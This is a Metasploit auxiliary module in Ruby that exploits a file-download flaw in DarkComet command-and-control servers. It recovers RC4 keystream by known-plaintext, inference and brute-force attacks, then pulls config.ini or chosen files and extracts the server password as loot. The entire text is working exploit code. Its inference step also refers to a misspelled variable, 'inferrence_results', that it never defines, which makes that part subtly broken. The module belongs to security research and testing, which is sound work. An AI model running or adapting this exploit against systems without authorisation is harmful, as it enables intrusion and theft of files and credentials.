## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'DarkComet Server Remote File Download Exploit', 'Description' => %q{ This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up. The exploit does not need to know the password chosen for the bot/server communication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery 'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack ], 'References' => [ [ 'URL', 'https://www.nccgroup.com/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ], [ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ] ], 'DisclosureDate' => '2012-10-08', 'Platform' => 'win' )) register_options( [ Opt::RPORT(1604), Opt::RHOST(''), OptAddressLocal.new('LHOST', [true, 'This is our IP (as it appears to the DarkComet C2 server)', '']), OptString.new('KEY', [false, 'DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)', '']), OptBool.new('NEWVERSION', [false, 'Set to true if DarkComet version >= 5.1, set to false if version < 5.1', true]), OptString.new('TARGETFILE', [false, 'Target file to download (assumes password is set)', '']), OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]), OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1]) ]) end # Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext def xor_strings(s1, s2) s1.unpack('C*').zip(s2.unpack('C*')).map { |a, b| a ^ b }.pack('C*') end def get_keystream(ciphertext, known_plaintext) c = [ciphertext].pack('H*') if known_plaintext.length > c.length return xor_strings(c, known_plaintext[0, c.length]) elsif c.length > known_plaintext.length return xor_strings(c[0, known_plaintext.length], known_plaintext) else return xor_strings(c, known_plaintext) end end def use_keystream(plaintext, keystream) if keystream.length > plaintext.length return xor_strings(plaintext, keystream[0, plaintext.length]).unpack('H*')[0].upcase else return xor_strings(plaintext, keystream).unpack('H*')[0].upcase end end # Use RubyRC4 functionality (slightly modified from Max Prokopiev's implementation https://github.com/maxprokopiev/ruby-rc4/blob/master/lib/rc4.rb) # since OpenSSL requires at least 128-bit keys for RC4 while DarkComet supports any keylength def rc4_initialize(key) @q1 = 0 @q2 = 0 @key = [] key.each_byte { |elem| @key << elem } while @key.size < 256 @key.slice!(256..@key.size - 1) if @key.size >= 256 @s = (0..255).to_a j = 0 0.upto(255) do |i| j = (j + @s[i] + @key[i]) % 256 @s[i], @s[j] = @s[j], @s[i] end end def rc4_keystream @q1 = (@q1 + 1) % 256 @q2 = (@q2 + @s[@q1]) % 256 @s[@q1], @s[@q2] = @s[@q2], @s[@q1] @s[(@s[@q1] + @s[@q2]) % 256] end def rc4_process(text) text.each_byte.map { |i| (i ^ rc4_keystream).chr }.join end def dc_encryptpacket(plaintext, key) rc4_initialize(key) rc4_process(plaintext).unpack('H*')[0].upcase end # Try to execute the exploit def try_exploit(exploit_string, keystream, bruting) connect idtype_msg = sock.get_once(12) if idtype_msg.length != 12 disconnect return nil end if datastore['KEY'] != '' exploit_msg = dc_encryptpacket(exploit_string, datastore['KEY']) else # If we don't have a key we need enough keystream if keystream.nil? disconnect return nil end if keystream.length < exploit_string.length disconnect return nil end exploit_msg = use_keystream(exploit_string, keystream) end sock.put(exploit_msg) if bruting begin ack_msg = sock.timed_read(3, datastore['BRUTETIMEOUT']) rescue Timeout::Error disconnect return nil end else ack_msg = sock.get_once(3) end if ack_msg != "\x41\x00\x43" disconnect return nil # Different protocol structure for versions >= 5.1 elsif datastore['NEWVERSION'] == true if bruting begin filelen = sock.timed_read(10, datastore['BRUTETIMEOUT']).to_i rescue Timeout::Error disconnect return nil end else filelen = sock.get_once(10).to_i end if filelen == 0 disconnect return nil end if datastore['KEY'] != '' a_msg = dc_encryptpacket('A', datastore['KEY']) else a_msg = use_keystream('A', keystream) end sock.put(a_msg) if bruting begin filedata = sock.timed_read(filelen, datastore['BRUTETIMEOUT']) rescue Timeout::Error disconnect return nil end else filedata = sock.get_once(filelen) end if filedata.length != filelen disconnect return nil end sock.put(a_msg) disconnect return filedata else filedata = '' if bruting begin msg = sock.timed_read(1024, datastore['BRUTETIMEOUT']) rescue Timeout::Error disconnect return nil end else msg = sock.get_once(1024) end while (!msg.nil?) && (msg != '') filedata += msg if bruting begin msg = sock.timed_read(1024, datastore['BRUTETIMEOUT']) rescue Timeout::Error break end else msg = sock.get_once(1024) end end disconnect if filedata == '' return nil else return filedata end end end # Fetch a GetSIN response from C2 server def fetch_getsin connect idtype_msg = sock.get_once(12) if idtype_msg.length != 12 disconnect return nil end keystream = get_keystream(idtype_msg, 'IDTYPE') server_msg = use_keystream('SERVER', keystream) sock.put(server_msg) getsin_msg = sock.get_once(1024) disconnect getsin_msg end # Carry out the crypto attack when we don't have a key def crypto_attack(exploit_string) getsin_msg = fetch_getsin if getsin_msg.nil? return nil end getsin_kp = 'GetSIN' + datastore['LHOST'] + '|' keystream = get_keystream(getsin_msg, getsin_kp) if keystream.length < exploit_string.length missing_bytecount = exploit_string.length - keystream.length print_status("Missing #{missing_bytecount} bytes of keystream ...") inferrence_segment = '' brute_max = 4 if missing_bytecount > brute_max print_status("Using inference attack ...") # Offsets to monitor for changes target_offset_range = [] for i in (keystream.length + brute_max)..(keystream.length + missing_bytecount - 1) target_offset_range << i end # Store inference results inference_results = {} # As long as we haven't fully recovered all offsets through inference # We keep our observation window in a circular buffer with 4 slots with the buffer running between [head, tail] getsin_observation = [''] * 4 buffer_head = 0 for i in 0..2 getsin_observation[i] = [fetch_getsin].pack('H*') Rex.sleep(0.5) end buffer_tail = 3 # Actual inference attack happens here while !target_offset_range.empty? getsin_observation[buffer_tail] = [fetch_getsin].pack('H*') Rex.sleep(0.5) # We check if we spot a change within a position between two consecutive items within our circular buffer # (assuming preceding entries are static in that position) we observed a 'carry', ie. our observed position went from 9 to 0 target_offset_range.each do |x| index = buffer_head while index != buffer_tail do next_index = (index + 1) % 4 # The condition we impose is that observed character x has to differ between two observations and the character left of it has to differ in those same # observations as well while being constant in at least one previous or subsequent observation if (getsin_observation[index][x] != getsin_observation[next_index][x]) && (getsin_observation[index][x - 1] != getsin_observation[next_index][x - 1]) && ((getsin_observation[(index - 1) % 4][x - 1] == getsin_observation[index][x - 1]) || (getsin_observation[next_index][x - 1] == getsin_observation[(next_index + 1) % 4][x - 1])) target_offset_range.delete(x) inference_results[x] = xor_strings(getsin_observation[index][x], '9') break end index = next_index end end # Update circular buffer head & tail buffer_tail = (buffer_tail + 1) % 4 # Move head to right once tail wraps around, discarding oldest item in circular buffer if buffer_tail == buffer_head buffer_head = (buffer_head + 1) % 4 end end # Inference attack done, reconstruct final keystream segment inf_seg = ["\x00"] * (keystream.length + missing_bytecount) inferrence_results.each do |x, val| inf_seg[x] = val end inferrence_segment = inf_seg.slice(keystream.length + brute_max, inf_seg.length).join missing_bytecount = brute_max end if missing_bytecount > brute_max print_status("Improper keystream recovery ...") return nil end print_status("Initiating brute force ...") # Bruteforce first missing_bytecount bytes of timestamp (maximum of brute_max) charset = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0'] char_range = missing_bytecount.times.map { charset } char_range.first.product(*char_range[1..-1]) do |x| p = x.join candidate_plaintext = getsin_kp + p candidate_keystream = get_keystream(getsin_msg, candidate_plaintext) + inferrence_segment filedata = try_exploit(exploit_string, candidate_keystream, true) if !filedata.nil? return filedata end end return nil end try_exploit(exploit_string, keystream, false) end def parse_password(filedata) filedata.each_line { |line| elem = line.strip.split('=') if elem.length >= 1 if elem[0] == 'PASSWD' if elem.length == 2 return elem[1] else return '' end end end } return nil end def run # Determine exploit string if datastore['NEWVERSION'] == true if (datastore['TARGETFILE'] != '') && (datastore['KEY'] != '') exploit_string = 'QUICKUP1|' + datastore['TARGETFILE'] + '|' else exploit_string = 'QUICKUP1|config.ini|' end elsif (datastore['TARGETFILE'] != '') && (datastore['KEY'] != '') exploit_string = 'UPLOAD' + datastore['TARGETFILE'] + '|1|1|' else exploit_string = 'UPLOADconfig.ini|1|1|' end # Run exploit if datastore['KEY'] != '' filedata = try_exploit(exploit_string, nil, false) else filedata = crypto_attack(exploit_string) end # Harvest interesting credentials, store loot if !filedata.nil? # Automatically try to extract password from config.ini if we haven't set a key yet if datastore['KEY'] == '' password = parse_password(filedata) if password.nil? print_status("Could not find password in config.ini ...") elsif password == '' print_status("C2 server uses empty password!") else print_status("C2 server uses password [#{password}]") end end # Store to loot if datastore['STORE_LOOT'] == true print_status("Storing data to loot...") if (datastore['KEY'] == '') && (datastore['TARGETFILE'] != '') store_loot("darkcomet.file", "text/plain", datastore['RHOST'], filedata, 'config.ini', "DarkComet C2 server config file") else store_loot("darkcomet.file", "text/plain", datastore['RHOST'], filedata, datastore['TARGETFILE'], "File retrieved from DarkComet C2 server") end else print_status(filedata.to_s) end else print_error("Attack failed or empty config file encountered ...") end end end